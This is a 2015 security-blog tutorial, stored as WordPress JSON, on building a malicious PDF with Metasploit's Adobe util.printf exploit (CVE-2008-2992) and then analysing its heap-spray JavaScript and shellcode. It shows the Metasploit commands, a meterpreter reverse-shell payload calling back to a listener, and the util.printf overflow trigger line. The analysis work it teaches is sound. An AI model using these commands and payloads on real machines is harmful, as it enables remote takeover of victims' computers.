{"id":374,"date":"2015-09-17T07:52:07","date_gmt":"2015-09-17T07:52:07","guid":{"rendered":"http:\/\/www.adlice.com\/?p=374"},"modified":"2022-12-21T10:37:28","modified_gmt":"2022-12-21T10:37:28","slug":"infected-pdf-extract-payload","status":"publish","type":"post","link":"https:\/\/www.adlice.com\/de\/infected-pdf-extract-payload\/","title":{"rendered":"Infected PDF : How to Extract the payload ?"},"content":{"rendered":"\n<p><strong>Infected PDFs have always been a privileged way to infect users<\/strong> because this document format is very common and used by almost everyone. Moreover, there are many ways to <strong>exploit Acrobat Reader vulnerabilities<\/strong>, and it&#8217;s a very stealthy and elegant way to launch malware.<\/p>\n\n\n\n<p>In this article, I will show you how easy it is to craft a malicious PDF with custom shellcode and trigger a vulnerability to execute a payload. <strong>We will also analyse the malicious PDF<\/strong> to learn how the payload is stored, and how to extract it. 
<strong>This article is for research purposes only<\/strong>, don&#8217;t do bad things!<\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"0-what-is-a-pdf-format-analysis\">What is a PDF? Format Analysis<\/h4>\n\n\n\n<p><strong>PDF is an object-oriented format defined by Adobe<\/strong>. 
The format describes the document&#8217;s organization and embeds the dependencies the document needs (fonts, images, &#8230;). These objects are stored within the document as streams, most of the time encoded or compressed. Below is an overview of a classic PDF document. For more information, <a href=\"http:\/\/partners.adobe.com\/public\/developer\/tips\/topic_tip31.html\">please read Adobe&#8217;s specifications<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"725\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture6-2-1024x725.png\" alt=\"pdf format\" class=\"wp-image-375\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture6-2-1024x725.png 1024w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture6-2-300x212.png 300w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture6-2.png 1072w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"1-metasploit-infected-pdf-creation\">Metasploit: Infected PDF creation<\/h4>\n\n\n\n<p><strong>We will create a fake PDF<\/strong> with <a href=\"http:\/\/www.metasploit.com\/\">metasploit<\/a>, containing an exploit attempt as well as a custom payload (the code to execute). <strong>The exploit targets a specific version of Adobe Reader<\/strong>, so we will need to do some archaeology and find an old Reader version (thanks to <a href=\"http:\/\/www.oldapps.com\/\">http:\/\/www.oldapps.com\/<\/a>) to install on the target machine.<\/p>\n\n\n\n<p>So, first, let&#8217;s make this PDF. <strong>We will make an infected PDF that just opens the calculator<\/strong> (calc.exe) on the machine, for demonstration purposes. 
<strong>Open a metasploit console<\/strong> (installation of metasploit is not covered in this article) and type:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>use exploit\/windows\/fileformat\/adobe_utilprintf\nset FILENAME malicious.pdf\nset PAYLOAD windows\/exec\nset CMD calc.exe\nshow options\nexploit<\/code><\/pre>\n\n\n\n<p>This should look like this:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture7-1.png\"><img decoding=\"async\" width=\"1145\" height=\"684\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture7-1.png\" alt=\"metasploit malicious pdf\" class=\"wp-image-376\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture7-1.png 1145w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture7-1-300x179.png 300w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture7-1-1024x612.png 1024w\" sizes=\"(max-width: 1145px) 100vw, 1145px\" \/><\/a><\/figure>\n\n\n\n<p><strong>Copy the file that has just been created<\/strong> (here \/home\/osboxes\/.msf4\/local\/malicious.pdf) to a shared drive. You will need to get it onto your target machine.<\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"2-execution-of-the-infected-pdf\">Execution of the Infected PDF<\/h4>\n\n\n\n<p><strong>On the target machine, download and install a vulnerable Adobe Reader version<\/strong> (metasploit tells us it should be older than 8.1.2). I chose to <a href=\"http:\/\/www.oldapps.com\/adobe_reader.php?old_adobe=16\">install version 8.1.1<\/a>. Once installed, <strong>open the malicious.pdf file<\/strong>. You should see a <strong>calculator being spawned<\/strong> from the Adobe Reader process. 
That&#8217;s the exploit.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture8-1.png\"><img decoding=\"async\" width=\"1057\" height=\"516\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture8-1.png\" alt=\"pdf infected\" class=\"wp-image-377\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture8-1.png 1057w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture8-1-300x146.png 300w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture8-1-1024x500.png 1024w\" sizes=\"(max-width: 1057px) 100vw, 1057px\" \/><\/a><\/figure>\n\n\n\n<p><strong>I&#8217;ve built another PDF with a slightly different payload<\/strong>, just for fun:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>set PAYLOAD windows\/meterpreter\/reverse_tcp\nset LHOST 192.168.1.29\nset LPORT 4455<\/code><\/pre>\n\n\n\n<p>Here&#8217;s the result. <strong>Adobe Reader now hosts a backdoor<\/strong> (reverse shell) waiting for commands.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture9.png\"><img decoding=\"async\" width=\"1116\" height=\"505\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture9.png\" alt=\"pdf launching backdoor\" class=\"wp-image-378\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture9.png 1116w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture9-300x136.png 300w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture9-1024x463.png 1024w\" sizes=\"(max-width: 1116px) 100vw, 1116px\" \/><\/a><\/figure>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"3-pdf-stream-dumper-infected-pdf-analysis\">PDF Stream Dumper: Infected PDF Analysis<\/h4>\n\n\n\n<p>Played enough! 
Let&#8217;s see <strong>what&#8217;s inside that malicious PDF<\/strong>, and let&#8217;s try to <strong>extract the malicious payload<\/strong> (we&#8217;re still working with the calc.exe PDF). First, we will need a tool called <a href=\"http:\/\/sandsprite.com\/blogs\/index.php?uid=7&amp;pid=57\">PDF Stream Dumper, so download it<\/a>. <strong>Load the malicious PDF with it<\/strong>, and take some time to familiarize yourself with the tool.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture10.png\"><img decoding=\"async\" width=\"925\" height=\"599\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture10.png\" alt=\"pdf stream dumper\" class=\"wp-image-379\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture10.png 925w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture10-300x194.png 300w\" sizes=\"(max-width: 925px) 100vw, 925px\" \/><\/a><\/figure>\n\n\n\n<p>We can start by checking whether <strong>the tool detects a known exploit<\/strong>, using the <strong>&#8220;Exploit Scan&#8221; menu<\/strong>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Exploit CVE-2008-2992 Date:11.4.08 v8.1.2 - util.printf - found in stream: 6<\/code><\/pre>\n\n\n\n<p>Indeed, <strong>there&#8217;s an exploit hidden in stream 6<\/strong> (the one in blue on the capture). But let&#8217;s start from the beginning: when searching for exploits in a PDF, we most of the time encounter a <a href=\"https:\/\/en.wikipedia.org\/wiki\/Heap_spraying\">heap spray<\/a> performed by <strong>JavaScript code<\/strong>. The heap spray is used to <strong>place the payload on the heap, ready to be executed<\/strong> once the vulnerability has been triggered. 
<strong>If you open Stream 1<\/strong>, you can see:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/Type\/Catalog\/Outlines 2 0 R\/Pages 3 0 R\/OpenAction 5 0 R<\/code><\/pre>\n\n\n\n<p>This translates to an <strong>OpenAction pointing at stream 5<\/strong>. Let&#8217;s move to stream 5:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/Type\/Action\/S\/JavaScript\/JS 6 0 R<\/code><\/pre>\n\n\n\n<p>This says to <strong>execute the JavaScript located in stream 6<\/strong>. That stream contains plain JavaScript, so it&#8217;s time to open the <strong>&#8220;Javascript_UI&#8221; menu<\/strong>. We immediately recognize a big hex-encoded string, pushed into a variable for the heap spray. <strong>This is our payload:<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture11.png\"><img decoding=\"async\" width=\"1154\" height=\"745\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture11.png\" alt=\"pdf analysis\" class=\"wp-image-380\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture11.png 1154w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture11-300x194.png 300w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture11-1024x661.png 1024w\" sizes=\"(max-width: 1154px) 100vw, 1154px\" \/><\/a><\/figure>\n\n\n\n<p>Fortunately, we have tools to manipulate it and understand what it does. <strong>Select the payload<\/strong> (the part between quotes), and <strong>open the &#8220;Shellcode_analysis&#8221; menu<\/strong>. Then choose <strong>&#8220;scDbg &#8211; LibEmu Emulation&#8221;<\/strong>. 
You will get a new window with the <strong>shellcode decoded into bytes<\/strong> (you can even save it to a file):<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png\"><img decoding=\"async\" width=\"1152\" height=\"745\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png\" alt=\"pdf shellcode analysis\" class=\"wp-image-381\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png 1152w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12-300x194.png 300w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12-1024x662.png 1024w\" sizes=\"(max-width: 1152px) 100vw, 1152px\" \/><\/a><\/figure>\n\n\n\n<p><strong>LibEmu is a library that emulates a processor<\/strong>; it gives <strong>information about what the assembly code is trying to do<\/strong>. Just hit the <strong>&#8220;Launch&#8221; button<\/strong> and you will see:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture13.png\"><img decoding=\"async\" width=\"506\" height=\"221\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture13.png\" alt=\"libemu capture\" class=\"wp-image-382\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture13.png 506w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture13-300x131.png 300w\" sizes=\"(max-width: 506px) 100vw, 506px\" \/><\/a><\/figure>\n\n\n\n<p>Here it is: we can clearly see that the <strong>shellcode just opens a calc.exe window and exits<\/strong>.<br><strong>Let&#8217;s redo the same analysis for the other malicious PDF<\/strong> (reverse shell):<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture14.png\"><img decoding=\"async\" width=\"613\" height=\"277\" 
src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture14.png\" alt=\"libemu capture\" class=\"wp-image-383\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture14.png 613w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture14-300x136.png 300w\" sizes=\"(max-width: 613px) 100vw, 613px\" \/><\/a><\/figure>\n\n\n\n<p>Self-explanatory, right? <strong>The shellcode loads the library needed to manipulate sockets<\/strong> (ws2_32.dll) and <strong>tries to connect back to the C&amp;C<\/strong>. I haven&#8217;t talked about the exploit itself yet: <strong>it&#8217;s located at the end of the JavaScript code<\/strong> (as stated by the Exploit Scan, &#8220;util.printf &#8211; found in stream: 6&#8221;). <strong>It exploits a buffer overflow in the util.printf function<\/strong> to execute arbitrary code (here, our heap-sprayed shellcode).<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>util.printf(\"%45000.45000f\", 0);<\/code><\/pre>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"4-links\">Links<\/h4>\n\n\n\n<p>&#8211; <a href=\"http:\/\/www.sans.org\/reading-room\/whitepapers\/malicious\/owned-malicious-pdf-analysis-33443\">http:\/\/www.sans.org\/reading-room\/whitepapers\/malicious\/owned-malicious-pdf-analysis-33443<\/a><br>&#8211; <a href=\"http:\/\/www.oldapps.com\/adobe_reader.php\">http:\/\/www.oldapps.com\/adobe_reader.php<\/a><br>&#8211; <a href=\"http:\/\/contagiodump.blogspot.fr\/2010\/08\/malicious-documents-archive-for.html\">http:\/\/contagiodump.blogspot.fr\/2010\/08\/malicious-documents-archive-for.html<\/a><br>&#8211; <a href=\"http:\/\/contagiodump.blogspot.fr\/2013\/03\/16800-clean-and-11960-malicious-files.html\">http:\/\/contagiodump.blogspot.fr\/2013\/03\/16800-clean-and-11960-malicious-files.html<\/a><br>&#8211; <a 
href=\"http:\/\/eternal-todo.com\/blog\/cve-2011-2462-exploit-analysis-peepdf\">http:\/\/eternal-todo.com\/blog\/cve-2011-2462-exploit-analysis-peepdf<\/a><br>&#8211; <a href=\"http:\/\/resources.infosecinstitute.com\/analyzing-malicious-pdf\/\">http:\/\/resources.infosecinstitute.com\/analyzing-malicious-pdf\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Infected PDF: Extract the payload &#8211; Infected PDFs have always been a popular way to infect computers, learn how malicious PDF files are built.<\/p>\n","protected":false},"author":1,"featured_media":381,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[36,84],"tags":[335,8,334,336,85],"class_list":["post-374","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-analysis","category-tutorial","tag-exploit","tag-malware","tag-metasploit","tag-pdf","tag-tutorial","category-36","category-84","description-off"],"views":16040,"yoast_score":65,"yoast_readable":30,"featured_image_src":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png","author_info":{"display_name":"tigzy","author_link":"https:\/\/www.adlice.com\/de\/author\/tigzy\/"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Infected PDF: How to Extract the Payload | Analysis \u2022 Adlice Software<\/title>\n<meta name=\"description\" content=\"Infected PDF have always been a popular way to infect computers. 
Learn how malicious PDF are made with metasploit, and analyse them.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Infected PDF: How to Extract the Payload | Analysis \u2022 Adlice Software\" \/>\n<meta property=\"og:description\" content=\"Infected PDF have always been a popular way to infect computers. Learn how malicious PDF are made with metasploit, and analyse them.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/\" \/>\n<meta property=\"og:site_name\" content=\"Adlice Software\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/RogueKiller\" \/>\n<meta property=\"article:published_time\" content=\"2015-09-17T07:52:07+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-12-21T10:37:28+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1152\" \/>\n\t<meta property=\"og:image:height\" content=\"745\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"tigzy\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@AdliceSoftware\" \/>\n<meta name=\"twitter:site\" content=\"@AdliceSoftware\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"tigzy\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"6\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" 
class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/\"},\"author\":{\"name\":\"tigzy\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d\"},\"headline\":\"Infected PDF : How to Extract the payload ?\",\"datePublished\":\"2015-09-17T07:52:07+00:00\",\"dateModified\":\"2022-12-21T10:37:28+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/\"},\"wordCount\":823,\"commentCount\":1,\"publisher\":{\"@id\":\"https:\/\/www.adlice.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png\",\"keywords\":[\"exploit\",\"malware\",\"metasploit\",\"pdf\",\"tutorial\"],\"articleSection\":[\"Analysis\",\"Tutorial\"],\"inLanguage\":\"de\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/\",\"url\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/\",\"name\":\"Infected PDF: How to Extract the Payload | Analysis \u2022 Adlice Software\",\"isPartOf\":{\"@id\":\"https:\/\/www.adlice.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png\",\"datePublished\":\"2015-09-17T07:52:07+00:00\",\"dateModified\":\"2022-12-21T10:37:28+00:00\",\"description\":\"Infected PDF have always been a popular way to infect computers. 
Learn how malicious PDF are made with metasploit, and analyse them.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#primaryimage\",\"url\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png\",\"contentUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png\",\"width\":1152,\"height\":745},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.adlice.com\/de\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Infected PDF : How to Extract the payload ?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.adlice.com\/#website\",\"url\":\"https:\/\/www.adlice.com\/\",\"name\":\"Adlice Software\",\"description\":\"Anti-malware and analysis tools\",\"publisher\":{\"@id\":\"https:\/\/www.adlice.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.adlice.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.adlice.com\/#organization\",\"name\":\"Adlice 
Software\",\"url\":\"https:\/\/www.adlice.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png\",\"contentUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png\",\"width\":276,\"height\":276,\"caption\":\"Adlice Software\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/RogueKiller\",\"https:\/\/x.com\/AdliceSoftware\",\"https:\/\/fr.linkedin.com\/company\/adlice-software\",\"https:\/\/www.youtube.com\/channel\/UC4CQ-gIZMGWxl-auf0QqYhQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d\",\"name\":\"tigzy\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g\",\"caption\":\"tigzy\"},\"description\":\"Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog posts.\",\"url\":\"https:\/\/www.adlice.com\/de\/author\/tigzy\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Infected PDF: How to Extract the Payload | Analysis \u2022 Adlice Software","description":"Infected PDF have always been a popular way to infect computers. 
Learn how malicious PDF are made with metasploit, and analyse them."}}